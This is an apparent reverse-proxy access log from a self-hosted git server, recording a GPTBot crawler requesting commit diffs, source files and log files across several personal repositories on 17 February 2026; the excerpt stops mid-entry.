"https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-2_access.log" [Client 74.7.227.38] [Length 36043] [Gzip 10.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" -[17/Feb/2026:16:16:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 26004] [Gzip 8.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 25529] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" -[17/Feb/2026:16:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 18022] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-3_error.log" [Client 74.7.227.38] [Length 23095] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-3_access.log" [Client 74.7.227.38] [Length 18390] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-2_error.log" [Client 74.7.227.38] [Length 19220] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" -[17/Feb/2026:16:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 27226] [Gzip 7.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" -[17/Feb/2026:16:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-3_error.log" [Client 74.7.227.38] [Length 20676] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" -[17/Feb/2026:16:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-3_access.log" [Client 74.7.227.38] [Length 25164] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-1_error.log" [Client 74.7.227.38] [Length 20869] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" -[17/Feb/2026:16:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 18448] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" -[17/Feb/2026:16:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-3_access.log" [Client 74.7.227.38] [Length 37208] [Gzip 10.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" -[17/Feb/2026:16:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm" [Client 74.7.227.38] [Length 52977] [Gzip 10.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" -[17/Feb/2026:16:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23806] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:16:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8498] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostcomplete&state=closed" -[17/Feb/2026:16:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastcomplete&state=all" [Client 74.7.227.38] [Length 8491] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastcomplete&state=open" -[17/Feb/2026:16:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog_final_org.py" [Client 74.7.227.38] [Length 43610] [Gzip 9.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" -[17/Feb/2026:16:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15943] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" -[17/Feb/2026:16:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12590] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" -[17/Feb/2026:16:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11051] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11044] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 16647] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13600] [Gzip 4.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py?display=source" [Client 74.7.227.38] [Length 20280] [Gzip 5.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" -[17/Feb/2026:16:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py?display=source" [Client 74.7.227.38] [Length 13377] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" -[17/Feb/2026:16:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11056] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64" -[17/Feb/2026:16:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/include/site/python3.12/greenlet" -[17/Feb/2026:16:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10077] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" [Client 74.7.227.38] [Length 10238] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" -[17/Feb/2026:16:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main" [Client 74.7.227.38] [Length 2844] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/branches" -[17/Feb/2026:16:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main" [Client 74.7.227.38] [Length 14721] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer?tab=activity" -[17/Feb/2026:16:16:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33635] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:16:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31271] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:16:16:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23704] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23730] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:16:16:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 10969] [Gzip 2.97] [Sent-to 